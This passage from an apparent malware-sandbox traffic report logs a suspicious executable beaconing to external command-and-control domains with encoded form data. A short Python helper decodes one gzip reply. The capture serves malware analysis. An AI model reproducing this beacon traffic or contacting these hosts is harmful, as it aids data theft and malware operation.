                                                                Data Ascii: 9rKHjDxP=TowXiW7yiZaI/a8bShqKOQsaztTKAFyWH734ZKxcH0u9JVKPOgJSyPWe9jRgK3Icpq3ErhCQDqXLNJqantcv/U/5wT/N1PTyycRgpkwwsUhY8im6z8wzIvnB342yL+5pvAHd0yml2g/7cvF9CqUBTxOA6ibl4leKzCv3Ndbj+QBNXrhW+Y63ZYOjryq3F0x9PMpQM5vj2ehsBiSykA3lOnsngbUOdCjxkbWlop8=
Dec 11, 2024 15:03:53.179491043 CET | 780 | IN | HTTP/1.1 404 Not Found
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Date: Wed, 11 Dec 2024 14:03:52 GMT
                                                                Server: Apache
                                                                X-Frame-Options: deny
                                                                Content-Encoding: gzip
                                                                Data Raw: 32 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 50 2a a0 d4 95 5a 84 90 b8 ac bd 63 7b 5a 7b 37 da 5d e7 03 c4 7f 67 bc 4e a4 84 b8 24 97 68 e7 e3 bd dd f7 66 1c 9f 7f 48 df 3f fc b8 bb 82 ca 35 f5 e5 59 dc ff 41 5c a1 90 97 67 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 6d e0 13 d6 6d 6a 04 b7 59 60 12 38 5c bb 28 b7 d6 67 3c d4 18 32 2d 37 63 78 b1 10 c6 29 34 63 a0 c2 88 06 e1 37 83 1e fe 2a a4 b2 72 b3 8b e9 f4 e5 fc 28 b9 22 e9 aa 67 72 8d 30 25 a9 d9 f4 b8 6b 21 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 9f b9 c9 12 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 8e 2f 96 89 fc a9 34 ba 55 72 e6 8c 50 96 d5 41 e5 0e eb fe 1c 88 d0 c9 38 20 9a 66 ca a2 d6 ab 59 45 52 a2 3a 46 88 23 6f d0 9e 87 fc 06 e6 4a 82 db f4 7b 00 8a bd 48 02 5c 2f c8 60 6f db d6 e9 5d 15 29 89 eb 31 14 ba 66 96 31 88 ba de 35 5d a7 e9 f5 cd d5 bb f4 a1 9f 83 7e 40 4e b7 19 9d 69 b7 a5 3a 0f 43 f8 e8 91 d9 25 f8 ca 23 16 3e 88 12 0a 5a a3 05 cb 42 [TRUNCATED]
                                                                Data Ascii: 23a (chunk-size line; the 0x23a-byte chunk that follows is gzip-compressed and not printable as text)


                                                                Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                3          | 192.168.2.7 | 49874       | 217.160.0.113  | 80               | 4508 | C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Dec 11, 2024 15:03:54.575210094 CET | 1802 bytes | OUT | POST /m5si/ HTTP/1.1
                                                                Host: www.prestigerugz.info
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Cache-Control: no-cache
                                                                Content-Length: 1253
                                                                Origin: http://www.prestigerugz.info
                                                                Referer: http://www.prestigerugz.info/m5si/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                                Data Raw: 39 72 4b 48 6a 44 78 50 3d 54 6f 77 58 69 57 37 79 69 5a 61 49 2f 61 38 62 53 68 71 4b 4f 51 73 61 7a 74 54 4b 41 46 79 57 48 37 33 34 5a 4b 78 63 48 30 6d 39 4a 6b 71 50 50 42 4a 53 6f 50 57 65 6a 7a 52 68 4b 33 49 37 70 71 76 49 72 68 66 6c 44 6f 66 4c 4f 70 32 61 6c 63 63 76 78 6b 2f 35 74 6a 2f 49 74 76 53 71 79 63 42 6b 70 6c 41 77 73 55 68 59 38 69 4b 36 6b 39 77 7a 4f 76 6e 43 6d 34 32 32 63 4f 35 42 76 47 76 4e 30 79 7a 59 31 54 48 37 63 50 56 39 41 34 4d 42 4d 42 4f 47 39 69 62 74 34 6c 53 52 7a 43 7a 52 4e 66 36 2b 2b 54 52 4e 62 61 34 4c 36 72 33 76 50 4b 4b 58 76 51 2b 49 4c 58 74 70 4a 74 5a 48 46 70 54 47 30 64 74 47 42 30 32 49 67 33 32 48 5a 46 51 61 73 61 73 44 62 79 66 2f 35 61 4f 35 2f 70 61 61 6d 46 54 7a 64 50 72 38 46 75 61 78 32 4f 33 2f 6c 42 51 48 72 78 4f 49 4a 57 42 7a 5a 48 69 59 37 33 5a 4c 50 59 41 46 59 38 39 66 68 72 75 50 48 73 2b 36 6a 76 2b 42 4a 68 45 35 6a 36 75 5a 2f 63 59 7a 68 34 58 75 68 73 48 48 4a 38 4e 6e 4f 79 61 52 2b 78 74 34 6f 41 61 47 48 54 48 39 77 [TRUNCATED]
                                                                Data Ascii: 9rKHjDxP=[TRUNCATED]
                                                                Dec 11, 2024 15:03:55.941884995 CET | 780 bytes | IN | HTTP/1.1 404 Not Found
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Date: Wed, 11 Dec 2024 14:03:55 GMT
                                                                Server: Apache
                                                                X-Frame-Options: deny
                                                                Content-Encoding: gzip
                                                                Data Raw: 32 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 50 2a a0 d4 95 5a 84 90 b8 ac bd 63 7b 5a 7b 37 da 5d e7 03 c4 7f 67 bc 4e a4 84 b8 24 97 68 e7 e3 bd dd f7 66 1c 9f 7f 48 df 3f fc b8 bb 82 ca 35 f5 e5 59 dc ff 41 5c a1 90 97 67 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 6d e0 13 d6 6d 6a 04 b7 59 60 12 38 5c bb 28 b7 d6 67 3c d4 18 32 2d 37 63 78 b1 10 c6 29 34 63 a0 c2 88 06 e1 37 83 1e fe 2a a4 b2 72 b3 8b e9 f4 e5 fc 28 b9 22 e9 aa 67 72 8d 30 25 a9 d9 f4 b8 6b 21 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 9f b9 c9 12 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 8e 2f 96 89 fc a9 34 ba 55 72 e6 8c 50 96 d5 41 e5 0e eb fe 1c 88 d0 c9 38 20 9a 66 ca a2 d6 ab 59 45 52 a2 3a 46 88 23 6f d0 9e 87 fc 06 e6 4a 82 db f4 7b 00 8a bd 48 02 5c 2f c8 60 6f db d6 e9 5d 15 29 89 eb 31 14 ba 66 96 31 88 ba de 35 5d a7 e9 f5 cd d5 bb f4 a1 9f 83 7e 40 4e b7 19 9d 69 b7 a5 3a 0f 43 f8 e8 91 d9 25 f8 ca 23 16 3e 88 12 0a 5a a3 05 cb 42 [TRUNCATED]
                                                                Data Ascii: 23a (chunk-size line; the 0x23a-byte chunk that follows is gzip-compressed and not printable as text)


                                                                Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                4          | 192.168.2.7 | 49880       | 217.160.0.113  | 80               | 4508 | C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Dec 11, 2024 15:03:57.225361109 CET | 499 bytes | OUT | GET /m5si/?9rKHjDxP=eqY3hh7t27bJ5LQcNwCEIywmzarZF02UJ8jqVv8fYDW4JFKoOjNM9tGFtSdYH3IXt9v4kCCdG8KeR7OcjMcn2k/dwiDu7fbQ4+QluVQl8FQgs02h3ek4MsPNmfC+au8Zmg3P0HGq0iPg&rLx0p=06jDTp00Q HTTP/1.1
                                                                Host: www.prestigerugz.info
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                                Dec 11, 2024 15:03:58.500950098 CET | 1236 bytes | IN | HTTP/1.1 404 Not Found
                                                                Content-Type: text/html
                                                                Content-Length: 1271
                                                                Connection: close
                                                                Date: Wed, 11 Dec 2024 14:03:58 GMT
                                                                Server: Apache
                                                                X-Frame-Options: deny
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"> </div> <script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + [TRUNCATED]
                                                                Dec 11, 2024 15:03:58.500996113 CET | 203 bytes | IN | Data Raw: 20 20 20 20 20 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 20 2b 20 27 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 49 4f 4e 4f 53 50 61 72 6b 69 6e 67 55 4b 27 0a
                                                                Data Ascii: + window.location.host + '/' + 'IONOSParkingUK' + '/park.js">' + '<\/script>' ); </script> </body></html>


                                                                Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                5          | 192.168.2.7 | 49916       | 154.90.58.209  | 80               | 4508 | C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Dec 11, 2024 15:04:13.146753073 CET | 754 bytes | OUT | POST /521z/ HTTP/1.1
                                                                Host: www.jijievo.site
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Cache-Control: no-cache
                                                                Content-Length: 221
                                                                Origin: http://www.jijievo.site
                                                                Referer: http://www.jijievo.site/521z/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                                Data Raw: 39 72 4b 48 6a 44 78 50 3d 56 7a 66 67 30 4d 64 49 55 66 70 62 37 48 2b 41 67 72 57 45 6d 38 79 2b 69 68 56 6f 35 51 61 2f 2b 65 63 36 73 51 6a 46 51 39 4e 6b 46 32 34 74 67 78 50 75 6f 79 50 78 46 74 34 4b 33 6c 42 73 32 6d 68 68 49 45 54 51 37 65 62 72 76 4a 48 34 42 59 73 55 4e 48 51 6f 48 59 2b 35 33 51 51 47 6c 51 7a 46 4b 74 61 7a 42 69 5a 4e 76 76 78 52 6f 34 78 77 4b 79 74 4a 63 43 74 35 36 7a 33 6f 6f 68 52 7a 46 5a 35 2f 2b 43 2b 45 35 56 6a 38 2b 66 58 52 41 54 4b 39 53 4c 39 45 7a 61 45 58 33 2b 68 74 5a 53 78 6e 71 78 57 2f 39 61 55 63 78 71 46 39 64 36 31 74 4c 49 61 6e 54 79 78 6f 45 52 31 79 58 2b 45 6f 5a 2f 37 35 44 54 69 58 56 51 3d 3d
                                                                Data Ascii: 9rKHjDxP=Vzfg0MdIUfpb7H+AgrWEm8y+ihVo5Qa/+ec6sQjFQ9NkF24tgxPuoyPxFt4K3lBs2mhhIETQ7ebrvJH4BYsUNHQoHY+53QQGlQzFKtazBiZNvvxRo4xwKytJcCt56z3oohRzFZ5/+C+E5Vj8+fXRATK9SL9EzaEX3+htZSxnqxW/9aUcxqF9d61tLIanTyxoER1yX+EoZ/75DTiXVQ==
                                                                Dec 11, 2024 15:04:14.755060911 CET | 241 bytes | IN | HTTP/1.1 200 OK
                                                                Content-Encoding: gzip
                                                                Content-Type: text/html; charset=UTF-8
                                                                Date: Wed, 11 Dec 2024 14:04:14 GMT
                                                                Server: nginx
                                                                Vary: Accept-Encoding
                                                                Content-Length: 44
                                                                Connection: close
                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 0b cd 4b 4c ca 49 55 28 c9 57 48 4f 2d 51 48 ce cf cb 4b 4d 2e c9 cc cf 03 00 83 11 dc 67 18 00 00 00
                                                                Data Ascii: (44-byte gzip-compressed body; not printable as text)


                                                                Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                6          | 192.168.2.7 | 49926       | 154.90.58.209  | 80               | 4508 | C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Dec 11, 2024 15:04:15.808640957 CET | 774 bytes | OUT | POST /521z/ HTTP/1.1
                                                                Host: www.jijievo.site
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Cache-Control: no-cache
                                                                Content-Length: 241
                                                                Origin: http://www.jijievo.site
                                                                Referer: http://www.jijievo.site/521z/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                                Data Raw: 39 72 4b 48 6a 44 78 50 3d 56 7a 66 67 30 4d 64 49 55 66 70 62 36 6b 32 41 74 73 71 45 75 38 79 39 75 42 56 6f 77 77 61 37 2b 65 41 36 73 55 36 61 52 49 6c 6b 46 57 49 74 78 46 62 75 6c 53 50 78 4e 4e 34 50 7a 6c 42 6c 32 6d 74 44 49 41 50 51 37 65 50 72 76 4c 66 34 42 75 6b 56 4d 58 51 71 50 34 2b 37 36 77 51 47 6c 51 7a 46 4b 72 33 63 42 69 68 4e 75 66 42 52 70 61 5a 7a 57 43 74 49 55 69 74 35 73 7a 33 73 6f 68 51 6d 46 64 67 61 2b 41 57 45 35 58 72 38 2f 4f 58 53 4f 54 4b 37 64 72 38 4b 33 66 35 73 37 39 59 53 41 54 42 67 6c 6d 6d 44 78 4d 56 2b 72 49 4a 52 44 72 4e 57 50 4b 2b 52 45 55 73 64 47 51 78 71 61 63 77 4a 47 49 65 54 4f 42 44 54 44 74 4b 6f 58 50 6d 54 66 51 50 79 4b 66 38 79 68 63 45 41 53 69 6b 3d
                                                                Data Ascii: 9rKHjDxP=Vzfg0MdIUfpb6k2AtsqEu8y9uBVowwa7+eA6sU6aRIlkFWItxFbulSPxNN4PzlBl2mtDIAPQ7ePrvLf4BukVMXQqP4+76wQGlQzFKr3cBihNufBRpaZzWCtIUit5sz3sohQmFdga+AWE5Xr8/OXSOTK7dr8K3f5s79YSATBglmmDxMV+rIJRDrNWPK+REUsdGQxqacwJGIeTOBDTDtKoXPmTfQPyKf8yhcEASik=
                                                                Dec 11, 2024 15:04:17.411772013 CET | 241 bytes | IN | HTTP/1.1 200 OK
                                                                Content-Encoding: gzip
                                                                Content-Type: text/html; charset=UTF-8
                                                                Date: Wed, 11 Dec 2024 14:04:17 GMT
                                                                Server: nginx
                                                                Vary: Accept-Encoding
                                                                Content-Length: 44
                                                                Connection: close
                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 0b cd 4b 4c ca 49 55 28 c9 57 48 4f 2d 51 48 ce cf cb 4b 4d 2e c9 cc cf 03 00 83 11 dc 67 18 00 00 00
                                                                Data Ascii: (44-byte gzip-compressed body; not printable as text)


                                                                Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                7          | 192.168.2.7 | 49933       | 154.90.58.209  | 80               | 4508 | C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Dec 11, 2024 15:04:18.470424891 CET | 1787 bytes | OUT | POST /521z/ HTTP/1.1
                                                                Host: www.jijievo.site
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Cache-Control: no-cache
                                                                Content-Length: 1253
                                                                Origin: http://www.jijievo.site
                                                                Referer: http://www.jijievo.site/521z/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                                Data Raw: 39 72 4b 48 6a 44 78 50 3d 56 7a 66 67 30 4d 64 49 55 66 70 62 36 6b 32 41 74 73 71 45 75 38 79 39 75 42 56 6f 77 77 61 37 2b 65 41 36 73 55 36 61 52 49 39 6b 45 6e 6f 74 6a 58 7a 75 6b 53 50 78 48 74 34 4f 7a 6c 41 33 32 6d 31 48 49 48 48 71 37 64 33 72 39 61 2f 34 48 63 4d 56 47 58 51 71 4e 34 2b 34 33 51 52 63 6c 51 6a 42 4b 74 58 63 42 69 68 4e 75 63 5a 52 74 49 78 7a 46 53 74 4a 63 43 74 31 36 7a 33 55 6f 68 59 32 46 64 74 76 2b 77 32 45 35 33 37 38 39 38 2f 53 43 54 4b 35 65 72 39 58 33 66 39 7a 37 39 46 68 41 54 46 4f 6c 68 53 44 7a 59 49 30 70 36 46 39 41 4c 74 4f 47 59 36 31 4b 46 45 4c 4a 77 6b 57 61 4f 6f 57 61 4b 32 38 4b 33 6e 4d 4b 74 54 70 44 64 61 45 63 67 6a 37 46 35 4e 59 37 66 41 56 4f 32 44 34 30 42 6b 73 39 4c 70 45 34 48 47 47 56 46 39 34 63 35 68 57 53 37 2b 4e 77 66 50 4b 34 4c 69 6c 70 6b 53 32 68 7a 56 6a 4e 51 57 68 33 49 69 61 41 44 63 4b 72 4a 69 30 73 30 52 6a 69 52 37 55 62 69 61 78 37 75 67 4a 45 36 38 62 59 48 69 2f 45 57 67 32 77 42 4a 6d 68 46 42 43 57 55 41 45 58 [TRUNCATED]
                                                                Data Ascii: 9rKHjDxP=[TRUNCATED]


                                                                Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                8          | 192.168.2.7 | 49939       | 154.90.58.209  | 80               | 4508 | C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Dec 11, 2024 15:04:21.137115002 CET | 494 bytes | OUT | GET /521z/?9rKHjDxP=Yx3A360WU89Z0GGKhcjTsfSOrSBN5i2s/KQE4E7BbN1HAmIot3HipiLJPY42zmsSwDZ5HnrJyLyqyKfyPPN/G2BSEq3A6jonlAGxKbazJEUegoNulYJrFScZeGEO6SiohwMlB95u5jWi&rLx0p=06jDTp00Q HTTP/1.1
                                                                Host: www.jijievo.site
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                                Dec 11, 2024 15:04:22.734311104 CET | 197 bytes | IN | HTTP/1.1 200 OK
                                                                Content-Type: text/html; charset=UTF-8
                                                                Date: Wed, 11 Dec 2024 14:04:22 GMT
                                                                Server: nginx
                                                                Vary: Accept-Encoding
                                                                Content-Length: 24
                                                                Connection: close
                                                                Data Raw: 55 6e 61 62 6c 65 20 74 6f 20 67 65 74 20 63 6f 6e 6e 65 63 74 69 6f 6e
                                                                Data Ascii: Unable to get connection
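The two 200 OK replies from www.jijievo.site in sessions 5 and 6 carry a 44-byte gzip body whose "Data Ascii" rendering is unreadable, while the reply in session 8 above is sent uncompressed. The following is an added example and not part of the Joe Sandbox report: it takes the 44 bytes exactly as printed in the report's Data Raw line, walks the gzip container by hand (RFC 1952 header, raw DEFLATE stream, then the CRC32/ISIZE trailer) and returns the inflated text together with whether the trailer agrees with it. Inflating those bytes yields "Unable to get connection", the same 24-byte string the server returns in clear in session 8, so all three jijievo.site exchanges end in the same server-side answer. The constant name and the function name are mine.

```python
import struct
import zlib

# Constructed from the capture above: the 44-byte body of the "HTTP/1.1 200 OK"
# replies from www.jijievo.site (sessions 5 and 6), copied from the report's
# "Data Raw" line. The name is mine; the bytes are the sandbox's.
JIJIEVO_200_BODY = bytes.fromhex(
    "1f8b0800000000000003"                                    # gzip header, OS=3
    "0bcd4b4cca495528c957484f2d5148cecfcb4b4d2ec9cccf0300"    # raw DEFLATE stream
    "8311dc6718000000"                                        # CRC32 + ISIZE trailer
)

GZIP_MAGIC = b"\x1f\x8b"
CM_DEFLATE = 8


def inflate_gzip_body(body: bytes) -> dict:
    """Inflate one gzip member without trusting its trailer.

    The header is parsed by hand, the DEFLATE stream is inflated raw
    (wbits=-15, no wrapper), and the CRC32/ISIZE trailer is checked against
    the inflated bytes afterwards. A truncated capture therefore still yields
    whatever plaintext survived, with complete=False instead of an exception.
    """
    if len(body) < 18 or body[:2] != GZIP_MAGIC:
        raise ValueError("not a gzip member")
    cm, flg = body[2], body[3]
    if cm != CM_DEFLATE:
        raise ValueError(f"unsupported compression method {cm}")
    pos = 10  # fixed header: ID1 ID2 CM FLG MTIME(4) XFL OS
    if flg & 0x04:  # FEXTRA: 2-byte length, then that many bytes
        xlen = struct.unpack_from("<H", body, pos)[0]
        pos += 2 + xlen
    if flg & 0x08:  # FNAME: zero-terminated
        pos = body.index(b"\x00", pos) + 1
    if flg & 0x10:  # FCOMMENT: zero-terminated
        pos = body.index(b"\x00", pos) + 1
    if flg & 0x02:  # FHCRC: 16-bit header CRC
        pos += 2

    d = zlib.decompressobj(wbits=-zlib.MAX_WBITS)  # raw DEFLATE
    plain = d.decompress(body[pos:]) + d.flush()
    result = {
        "text": plain.decode("utf-8", "replace"),
        "complete": d.eof,          # True only if the final DEFLATE block was seen
        "isize": None,
        "isize_ok": False,
        "crc_ok": False,
        "os_byte": body[9],         # 3 = Unix in RFC 1952
    }
    trailer = d.unused_data         # everything after the DEFLATE stream
    if d.eof and len(trailer) >= 8:
        crc32, isize = struct.unpack("<II", trailer[:8])
        result.update(
            isize=isize,
            isize_ok=isize == (len(plain) & 0xFFFFFFFF),
            crc_ok=crc32 == (zlib.crc32(plain) & 0xFFFFFFFF),
        )
    return result


if __name__ == "__main__":
    print(inflate_gzip_body(JIJIEVO_200_BODY))
```

Parsing the container yourself rather than calling gzip.decompress() is the better habit for captures: a dump cut off mid-body still returns the readable prefix, and a CRC mismatch points at a transcription error in the hex rather than at the server. The ISIZE field of this body is 0x18 = 24, matching the Content-Length of the uncompressed reply in session 8.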


                                                                Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                9          | 192.168.2.7 | 49955       | 38.181.21.178  | 80               | 4508 | C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Dec 11, 2024 15:04:28.480719090 CET | 745 bytes | OUT | POST /l9wb/ HTTP/1.1
                                                                Host: www.44ynh.top
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Cache-Control: no-cache
                                                                Content-Length: 221
                                                                Origin: http://www.44ynh.top
                                                                Referer: http://www.44ynh.top/l9wb/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                                Data Raw: 39 72 4b 48 6a 44 78 50 3d 51 49 41 31 41 74 57 46 51 33 42 67 37 66 76 69 61 61 53 56 4e 54 56 6a 55 59 35 48 55 4a 5a 31 6b 75 31 31 55 6e 57 4d 47 68 59 78 43 78 2b 63 54 49 46 31 37 78 77 59 43 5a 6a 71 72 4a 61 67 4a 4d 70 52 63 76 39 66 64 62 59 71 45 4c 42 54 79 4d 4d 44 31 4c 32 35 78 39 70 33 6d 34 2b 48 36 4a 4e 61 34 77 69 51 57 64 47 73 62 78 4a 51 4b 62 4d 32 52 30 71 75 61 70 56 58 37 74 4c 4e 72 53 48 72 59 51 63 69 30 36 74 31 4e 74 4c 6b 63 32 52 4b 39 47 76 39 53 4d 33 44 56 62 6f 62 70 62 51 6b 62 7a 41 57 4f 31 35 5a 6f 63 71 48 56 72 76 38 72 58 7a 38 50 50 70 4e 68 67 2f 6b 31 39 78 6a 6c 2f 36 31 79 6d 78 67 6f 33 74 4c 6d 51 3d 3d
                                                                Data Ascii: 9rKHjDxP=QIA1AtWFQ3Bg7fviaaSVNTVjUY5HUJZ1ku11UnWMGhYxCx+cTIF17xwYCZjqrJagJMpRcv9fdbYqELBTyMMD1L25x9p3m4+H6JNa4wiQWdGsbxJQKbM2R0quapVX7tLNrSHrYQci06t1NtLkc2RK9Gv9SM3DVbobpbQkbzAWO15ZocqHVrv8rXz8PPpNhg/k19xjl/61ymxgo3tLmQ==
                                                                Dec 11, 2024 15:04:30.001517057 CET | 302 bytes | IN | HTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Wed, 11 Dec 2024 14:04:29 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 138
                                                                Connection: close
                                                                ETag: "66df0ead-8a"
                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                10         | 192.168.2.7 | 49964       | 38.181.21.178  | 80               | 4508 | C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe
                                                                Timestamp | Bytes transferred | Direction | Data
